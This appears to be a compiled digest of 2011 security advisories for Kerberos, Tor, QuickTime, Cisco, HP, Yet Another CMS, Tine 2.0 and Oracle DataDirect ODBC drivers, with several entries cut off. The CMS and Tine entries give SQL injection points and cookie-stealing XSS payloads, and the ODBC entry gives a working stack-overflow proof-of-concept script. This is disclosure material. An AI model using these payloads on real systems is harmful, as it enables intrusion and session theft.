MITKRB5-SA-2011-006 KDC denial of service vulnerabilities [CVE-2011-1527 CVE-2011-1528 CVE-2011-1529]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 MITKRB5-SA-2011-006 MIT krb5 Security Advisory 2011-006 Original release: 2011-10-18 Last update: 2011-10-18 Topic: KDC denial of service vulnerabilities CVE-2011-1527: null pointer dereference in KDC LDAP back end CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:H/RL:OF/RC:C CVSSv2 Base Score: 7.8 Access Vector: Network Access Complexity: Low Authentication: None Confidentiality Impact: None Integrity Impact: None Availability Impact:Complete CVSSv2 Temporal Score: 6.8 Exploitability: High Remediation Level: Official Fix Report Confidence: Confirmed CVE-2011-1528: assertion failure in multiple KDC back ends CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C CVSSv2 Base Score: 7.8 CVSSv2 Temporal Score: 6.1 CVE-2011-1529: null pointer dereference in multiple KDC back ends CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C CVSSv2 Base Score: 7.8 CVSSv2 Temporal Score: 6.1 SUMMARY === CVE-2011-1527: In releases krb5-1.9 and later, the KDC can crash due to a null pointer dereference if configured to use the LDAP back end. A trigger condition is publicly known but not known to be widely circulated. CVE-2011-1528: In releases krb5-1.8 and later, the KDC can crash due to an assertion failure. No exploit is known to exist, but there is public evidence that the unidentified trigger condition occurs in the field. CVE-2011-1529: In releases krb5-1.8 and later, the KDC can crash due to a null pointer dereference. No exploit is known to exist. IMPACT == CVE-2011-1527: An unauthenticated remote attacker can crash a KDC daemon via null pointer dereference if the KDC is configured to use the LDAP back end. (This is not the default configuration.) CVE-2011-1528: An unauthenticated remote attacker can crash a KDC daemon via assertion failure. CVE-2011-1529: An unauthenticated remote attacker can crash a KDC daemon via null pointer dereference. AFFECTED SOFTWARE = * The KDC in krb5-1.9 and later is vulnerable to CVE-2011-1527 when configured with the LDAP back end. Earlier releases had different code that masked this bug and did not crash under these conditions. * The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1528 when configured with the LDAP back end. When configured with the Berkeley DB (db2) back end, only releases krb5-1.8 through krb5-1.8.4 are vulnerable. * The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1529 when configured with either the Berkeley DB (db2) or the LDAP back end. FIXES = * Workaround: restart the KDC when it crashes, possibly using an automated monitoring process. * An upcoming release in the krb5-1.9.x series will fix CVE-2011-1527. * Upcoming releases in the krb5-1.8.x and krb5-1.9.x series will fix CVE-2011-1528 and CVE-2011-1529. * The patch for krb5-1.9.x is available at http://web.mit.edu/kerberos/advisories/2011-006-patch.txt A PGP-signed patch is available at http://web.mit.edu/kerberos/advisories/2011-006-patch.txt.asc * The patch for krb5-1.8.x is available at http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt A PGP-signed patch is available at http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt.asc REFERENCES == This announcement is posted at: http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-006.txt This announcement and related security advisories may be found on the MIT Kerberos security advisory page at: http://web.mit.edu/kerberos/advisories/index.html The main MIT Kerberos web page is at: http://web.mit.edu/kerberos/index.html CVSSv2: http://www.first.org/cvss/cvss-guide.html http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2 CVE: CVE-2011-1527 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1527 CVE: CVE-2011-1528 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1528 CVE: CVE-2011-1529 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1529 Debian bug #629558: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=629558 Ubuntu bug #715579: https://bugs.launchpad.net/ubuntu/+source/krb5/+bug/715579 ACKNOWLEDGMENTS === CVE-2011-1527: Nalin Dahyabhai and Andrej Ota independently reported this vulnerability. Kyle Moffett independently reported this bug to Debian. CVE-2011-1528: Mark Deneen reported this vulnerability to Ubuntu. CONTACT === The MIT Kerberos Team security contact address is krbcore-secur...@mit.edu. When sending sensitive information, please PGP-encrypt it using the following key: pub 2048R/56CD8F76 2010-12-29 [expires: 2012-02-01] uid MIT Kerberos Team Security Contact krbcore-secur...@mit.edu DETAILS === CVE-2011-1527: null pointer dereference in KDC LDAP back end Under certain error conditions, krb5_ldap_get_principal() in the KDC LDAP back end can return success yet leave the client principal entry as a null
[ GLSA 201110-13 ] Tor: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201110-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Tor: Multiple vulnerabilities Date: October 18, 2011 Bugs: #351920, #359789 ID: 201110-13 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities were found in Tor, the most severe of which may allow a remote attacker to execute arbitrary code. Background == Tor is an implementation of second generation Onion Routing, a connection-oriented anonymizing communication service. Affected packages = --- Package / Vulnerable /Unaffected --- 1 net-misc/tor 0.2.1.30 = 0.2.1.30 Description === Multiple vulnerabilities have been discovered in Tor. Please review the CVE identifiers referenced below for details. Impact == A remote unauthenticated attacker may be able to execute arbitrary code with the privileges of the Tor process or create a Denial of Service. Workaround == There is no known workaround at this time. Resolution == All Tor users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =net-misc/tor-0.2.1.30 NOTE: This is a legacy GLSA. Updates for all affected architectures are available since April 2, 2011. It is likely that your system is already no longer affected by this issue. References == [ 1 ] CVE-2011-0015 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0015 [ 2 ] CVE-2011-0016 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0016 [ 3 ] CVE-2011-0427 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0427 [ 4 ] CVE-2011-0490 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0490 [ 5 ] CVE-2011-0491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0491 [ 6 ] CVE-2011-0492 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0492 [ 7 ] CVE-2011-0493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0493 [ 8 ] CVE-2011-1924 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1924 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201110-13.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2011 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code Execution Vulnerability
ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-295 October 18, 2011 -- CVE ID: CVE-2011-3222 -- CVSS: 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Quicktime handles flashpix files. When a flashpix contains a tile that has a Compression Type 0x2 (JPEG) and an 'JPEG tables selector' value that is bigger then the global stream property 'Maximum JPEG table index', Quicktime will write outside the global JPEG table. This corruption could lead to remote code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT5002 -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-18 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi signature.asc Description: OpenPGP digital signature
Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities Advisory ID: cisco-sa-20111019-sns Revision 1.0 For Public Release 2011 October 19 16:00 UTC (GMT) +- Summary === The Cisco Show and Share webcasting and video sharing application contains two vulnerabilities. The first vulnerability allows an unauthenticated user to access several administrative web pages. The second vulnerability permits an authenticated user to execute arbitrary code on the device under the privileges of the web server user account. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available for these vulnerabilities. This advisory is posted at: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-sns Note:Effective October 18, 2011, Cisco moved the current list of Cisco Security Advisories and Responses published by Cisco PSIRT. The new location is: http://tools.cisco.com/security/center/publicationListing You can also navigate to this page from the CiscoProducts and Services menu of the Cisco Security Intelligence Operations (SIO) Portal. Following this transition, new Cisco Security Advisories and Responses will be published to the new location. Although the URL has changed, the content of security documents and the vulnerability policy are not impacted. Cisco will continue to disclose security vulnerabilities in accordance with the published Security Vulnerability Policy. Affected Products = Vulnerable Products +-- These vulnerabilities affect all versions of Cisco Show and Share prior to the first fixed releases as indicated in the Software Version and Fixes section of this Cisco Security Advisory. To determine the Cisco Show and Share Software release that an appliance is running, administrators can log in to the Appliance Administrative Interface (AAI), and access the main menu. The software version is identified next to the Cisco Show and Share field. The following example identifies a Cisco Show and Share appliance running version 5.2.2 Cisco Show and Share Application Administration Interface Main Menu IP: 192.168.0.1 Cisco Show and Share 5.2.2 http://sns.example.com/vportal SHOW_INFO Show system information. BACKUP_AND_RESTORE Back up and restore. APPLIANCE_CONTROL Configure advance options NETWORK_SETTINGSConfigure network parameters. DATE_TIME_SETTINGS Configure date and time CERTIFICATE_MANAGEMENT Manage all certificates in the system OK LOG OUT Products Confirmed Not Vulnerable + The following products are confirmed not vulnerable: * Cisco Video Portal No other Cisco products are currently known to be affected by these vulnerabilities. Details === Cisco Show and Share is a webcasting and video sharing application that helps organizations create secure video communities to share ideas and expertise, optimize global video collaboration, and personalize the connection between customers, employees, and students with user-generated content. Cisco Show and Share provides the ability to create live and on-demand video content, and define who can watch specific content. It offers viewer collaboration tools such as commenting, rating, and word tagging, and provides comprehensive access reporting. Cisco Show and Share contains the following vulnerabilities: * Anonymous users can access some administration pages Several administrative web pages of the Cisco Show and Share can be accessed without prior user authentication. These include pages for accessing Encoders and Pull Configurations, Push Configurations, Video Encoding Formats, and Transcoding. This vulnerability is documented in Cisco Bug ID CSCto73758, and has been assigned CVE identifier CVE-2011-2584. * Cisco Show and Share arbitrary code execution vulnerability An authenticated user with privileges to upload videos could upload code that could then be executed under the privileges of the web server. Note: The web server runs as a non-root user. Details regarding the impact of accessing each one of these administrative pages are included in the Impact section of this Cisco Security Advisory. This vulnerability is documented in Cisco Bug ID CSCto69857, and has been assigned CVE identifier CVE-2011-2585. Vulnerability Scoring Details = Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS
Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command Execution Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command Execution Vulnerability Advisory ID: cisco-sa-20111019-cs Revision 1.0 For Public Release 2011 October 19 16:00 UTC (GMT) +- Summary === CiscoWorks Common Services for Microsoft Windows contains a vulnerability that could allow an authenticated, remote attacker to execute arbitrary commands on the affected system with the privileges of a system administrator. Cisco has released free software updates that address this vulnerability. There are no workarounds that mitigate this vulnerability. This advisory is posted at: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-cs Note:Effective October 18, 2011, Cisco moved the current list of Cisco Security Advisories and Responses published by Cisco PSIRT. The new location is: http://tools.cisco.com/security/center/publicationListing You can also navigate to this page from the Cisco Products and Services menu of the Cisco Security Intelligence Operations (SIO) Portal. Following this transition, new Cisco Security Advisories and Responses will be published to the new location. Although the URL has changed, the content of security documents and the vulnerability policy are not impacted. Cisco will continue to disclose security vulnerabilities in accordance with the published Security Vulnerability Policy. Affected Products = Vulnerable Products +-- This vulnerability affects all versions of CiscoWorks Common Services-based products running on Microsoft Windows Common Services version 4.1 and later are not affected by this vulnerability. The following CiscoWorks products with the default Common Services installed are affected by this vulnerability, due to their underlying Common Services version: * CiscoWorks LAN Management Solution +---+ | LAN Management Solution Versions | Common Services Versions | |+--| | Prior to 3.2 on Microsoft Windows | Various | |+--| | 3.2 on Microsoft Windows | 3.3 | |+--| | 3.2.1 on Microsoft Windows | 3.3.1| |+--| | 4.0 on Microsoft Windows | 4.0 | |+--| | 4.0.1 on Microsoft Windows | 4.0.1| +---+ Note: CiscoWorks LAN Management Solution versions prior to 3.2 reached end of software maintenance. Customers should contact their Cisco support team for assistance in upgrading to a supported version of CiscoWorks LAN Management Solution. * Cisco Security Manager +---+ | Security Manager Versions | Common Services | | | Versions | |-+-| | Prior to 3.2| Various | |-+-| | 3.2, 3.2 SP1, 3.2 SP2 | 3.1 | |-+-| | 3.2.1, 3.2.1 SP1| 3.1.1 | |-+-| | 3.2.2, 3.2.2 SP1, 3.2.2 SP2, 3.2.2 SP3, | 3.2 | | 3.2.2 SP4 | | |-+-| | 3.3, 3.3 SP1, 3.3 SP2 | 3.2 | |-+-| | 3.3.1, 3.3.1 SP1, 3.3.1 SP2, 3.3.1 SP3 | 3.2 | |-+-| | 4.0, 4.0 SP1| 3.3 | |-+-| | 4.0.1, 4.0.1 SP1| 3.3 | |-+-| | 4.1 | 3.3 | +---+ Note: Cisco Security Manager versions prior to 3.2 reached end of software maintenance. Customers should contact their Cisco support team for assistance in upgrading to a supported version of
Yet Another CMS 1.0 SQL Injection XSS vulnerabilities
Advisory: Yet Another CMS 1.0 SQL Injection XSS vulnerabilities Advisory ID:SSCHADV2011-031 Author: Stefan Schurtz Affected Software: Successfully tested on Yet Another CMS 1.0 Vendor URL: http://yetanothercms.codeplex.com/ Vendor Status: informed EDB-ID: 17997 == Vulnerability Description: == Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities == Technical Details: == // search.php $result_set = get_search_result_set($_POST['pattern']); // includes/functions.php function get_search_result_set($pattern, $public = true) { global $connection; $query = SELECT id, subject_id, menu_name, position, visible, content, CONCAT('... ', SUBSTRING(content, LOCATE(' . $pattern . ',content), 200), ' ...') as fragment FROM pages WHERE content like '% . $pattern . %'; // index.php ?php find_selected_page(); ? // includes/functions.php function find_selected_page() { global $sel_subject; global $sel_page; if (isset($_GET['subj'])) { $sel_subject = get_subject_by_id($_GET['subj']); $sel_page = get_default_page($sel_subject['id']); } elseif (isset($_GET['page'])) { $sel_subject = NULL; $sel_page = get_page_by_id($_GET['page']); } else { $sel_subject = NULL; $sel_page = NULL; } } function get_page_by_id($page_id) { global $connection; $query = SELECT * ; $query .= FROM pages ; $query .= WHERE id= . $page_id . ; $query .= LIMIT 1; == Exploit == SQL Injection http://target/index.php?page=[sql injection] http://target/search.php - 'search field' - [sql injection] XSS http://target/search.php - 'search field' - '/scriptscriptalert(document.cookie)/script http://target/index.php?page='/scriptscriptalert(document.cookie)/script = Solution: = - Disclosure Timeline: 18-Oct-2011 - informed developers 19-Oct-2011 - release date of this security advisory Credits: Vulnerabilities found and advisory written by Stefan Schurtz. === References: === http://yetanothercms.codeplex.com/ http://yetanothercms.codeplex.com/workitem/643 http://www.rul3z.de/advisories/SSCHADV2011-031.txt
[security bulletin] HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on Windows, Local Information Disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03052686 Version: 1 HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on Windows, Local Information Disclosure NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-10-19 Last Updated: 2011-10-19 Potential Security Impact: Local information disclosure Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP MFP Digital Sending Software running on Windows. The vulnerability could result in disclosure of personal information contained in workflow metadata to unintended recipients. References: CVE-2011-3163 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP MFP Digital Sending Software v4.91.21 and all previous 4.9x versions BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-3163(AV:L/AC:H/Au:N/C:P/I:N/A:N) 1.2 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided HP MFP Digital Sending Software v4.20 to resolve the vulnerability. HP MFP Digital Sending Software v4.20 can be downloaded from http://www.hp.com/go/dss Note: Select DSS 4 free 60-day demo. HISTORY Version:1 (rev.1) - 19 October 2011 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2011 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk6e1KoACgkQ4B86/C0qfVnC7QCg98OOTEsBaEg8pxBHYQT2YiOZ X+cAniCW7fV96ZVOcEUE58254zfBdsGN =U3Rc -END PGP SIGNATURE-
Multiple vulnerabilities in Tine 2.0
Vulnerability ID: HTB23050 Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_tine_2_0.html Product: Tine 2.0 Vendor: Metaways Infosystems GmbH ( http://www.tine20.org ) Vulnerable Version: Maischa (2011/05) and probably prior Tested Version: Maischa (2011/05) Vendor Notification: 28 September 2011 Vulnerability Type: XSS (Cross Site Scripting) Status: Fixed by Vendor Risk level: Medium Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ ) Vulnerability Details: High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Tine 2.0, which can be exploited to perform cross-site scripting attacks. 1) Input passed via the lang GET parameter to /library/idnaconvert/example.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website. The following PoC code is available: http://[host]/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 2) Input appended to the URL after /library/idnaconvert/example.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site The following PoC is available: http://[host]/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E Successful exploitation of the vulnerabilities requires that Apache's directive AcceptPathInfo is set to on or default (default value is default) 3) Input appended to the URL after /library/phpexcel/phpexcel/shared/jama/docs/download.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site The following PoC is available: http://[host]/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E Successful exploitation of the vulnerabilities requires that Apache's directive AcceptPathInfo is set to on or default (default value is default) Solution: Upgrade to the most recent version Disclaimer: Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on the web page in Reference field.
[security bulletin] HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03058866Version: 1 HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2011-10-18Last Updated: 2011-10-18 Potential Security Impact: Remote execution of arbitrary code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities has been identified with HP Data Protector Notebook Extension. These vulnerabilities could be remotely exploited to allow execution of arbitrary code. References: CVE-2011-3156 (ZDI-CAN-1222), CVE-2011-3157 (ZDI-CAN-1225), CVE-2011-3158 (ZDI-CAN-1226), CVE-2011-3159 (ZDI-CAN-1227), CVE-2011-3160 (ZDI-CAN-1228), CVE-2011-3161 (ZDI-CAN-1229), CVE-2011-3162 (ZDI-CAN-1296). SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Data Protector Notebook Extension version 6.20, running on Windows platform (2000, 2003, XP, 2008, Vista, Win7). HP Data Protector for Personal Computers version 7.0, running on Windows platform (2000, 2003, XP, 2008, Vista, Win7). BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2011-3156(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 CVE-2011-3157(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 CVE-2011-3158(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 CVE-2011-3159(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 CVE-2011-3160(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 CVE-2011-3161(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 CVE-2011-3162(AV:N/AC:L/Au:N/C:C/I:C/A:C)10 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod along with TippingPoints Zero Day Initiative for reporting these vulnerabilities to security-al...@hp.com. RESOLUTION HP has provided the following patch to resolve this vulnerability. The patch can be retrieved from http://support.openview.hp.com/selfsolve/patches For HP Data Protector Notebook Extension v6.20 Operating System Platform Patch ID Windows (2000, 2003, XP, 2008, Vista, Win 7)DPPCWIN_1 For HP Data Protector for Personal Computers v7.0 Operating System Platform Patch ID Windows (2000, 2003, XP, 2008, Vista, Win 7)DPPCWIN_1 HISTORY Version: 1 (rev.1) - 18 October 2011 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For further information, contact normal HP Services support channel. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2011 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided as is without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAk6d1mcACgkQ4B86/C0qfVmSBQCfVWRjsmm4h0HwDNzYgssQJp/g VHYAoK1LgJ8Sg7PPumOBTM9Kf1W0+jYU =+SMK -END PGP SIGNATURE-
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability tested against: Microsoft Windows 2k3 r2 sp2 Oracle Hyperion Performance Management and BI (v11.1.2.1.0) download url of the Oracle Hyperion suite: http://www.oracle.com/technetwork/middleware/epm/downloads/index.html files tested: SystemInstaller-11121-win32.zip FoundationServices-11121-win32-Part1.zip FoundationServices-11121-win32-Part2.zip FoundationServices-11121-win32-Part3.zip FoundationServices-11121-win32-Part4.zip FoundationServices-11121-Part5.zip FoundationServices-11121-Part6.zip FoundationServices-11121-Part7.zip StaticContent-11121.zip RandAFoundation-11121.zip EPM_Architect-11121.zip Vulnerability: The mentioned product installs various drivers to allow the software to get informations from ODBC data sources. Some of them are vulnerable to a remote stack based buffer overflow which can be triggered by specifying an overlong HOST attribute inside the connection string. The software tries to do an unicode/ASCII conversion. In doing this, the stack is completely smashed allowing to redirect the execution flow to an user supplied buffer. Analysis for (*) and errata corrige, too many nights awake : When receiveng the attribute, arsqls24.dll does an unicode/ASCII conversion; this fragment of code counts the number of bytes needed and store it in eax .. 01D45C10 83C1 02 add ecx,2 01D45C13 83C0 01 add eax,1 01D45C16 66:8339 00 cmp word ptr ds:[ecx],0 01D45C1A ^75 F4jnz short ARSQLS24.01D45C10 .. the next operation is a copy loop which moves the needed bytes to a memory region pointed by ecx, trusting the eax counter. .. 01D48C36 8A16 mov dl,byte ptr ds:[esi] 01D48C38 83E8 01 sub eax,1 01D48C3B 8811 mov byte ptr ds:[ecx],dl 01D48C3D 83C1 01 add ecx,1 01D48C40 83C6 02 add esi,2 01D48C43 85C0 test eax,eax 01D48C45 ^75 EFjnz short ARSQLS24.01D48C36 .. The memory region pointed by ecx is adjacent to critical structures (stack pointers), so when the HOST attribute is an overlong string the stack is partially overwritten with user supplied values. The result, after a few steps: EAX ECX 0003 EDX 02B52E88 EBX 0013C720 ASCII AA ESP 0013C720 ASCII AA EBP 0013D1A4 ESI 02B56FF8 EDI 0001 EIP 41414141 C 0 ES 0023 32bit 0() P 1 CS 001B 32bit 0() A 0 SS 0023 32bit 0() Z 0 DS 0023 32bit 0() S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS NULL D 0 O 0 LastErr WSAHOST_NOT_FOUND (2AF9) EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G) MM0 MM1 MM2 MM3 MM4 MM5 MM6 8000 MM7 FEE0 poc: The underlying operating system contains the ADODB Connection ActiveX control which is marked safe for initialization and safe for scripting (implements the IObjectSafety interface) which could allow a remote attacker to specify the mentioned connection string. The IE security settings do not allow to open a connection from another domain but this can be used in conjuntion with a XSS vulnerabilty, connection string pollution or SQL injection vulnerabilities or through specific configuration files. Note also that I am mentioning the ADODB object for pure commodity: when installed, the ODBC drivers are availiable systemwide, so this is a good basis for remote privilege elevations of many kinds. Note that Internet Explorer does not crash when trying to execute EIP, attach a tool like faultmon to the IE sub-process. (*) !-- saved from url=(0014)about:internet -- script var obj = new ActiveXObject(ADODB.Connection); x=; for (i=0;i666;i++){x = x + } obj.ConnectionString =DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST= + x + ;IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null; obj.Open(); /script !-- saved from url=(0014)about:internet -- script var obj = new ActiveXObject(ADODB.Connection); x=; for (i=0;i1666;i++){x = x + } obj.ConnectionString =DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST= + x + ;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null; obj.Open(); /script !-- saved from url=(0014)about:internet -- script var obj = new ActiveXObject(ADODB.Connection); x=; for (i=0;i1666;i++){x = x + } obj.ConnectionString =DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST= + x +
OCS Inventory NG 2.0.1 Persistent XSS (CVE-2011-4024)
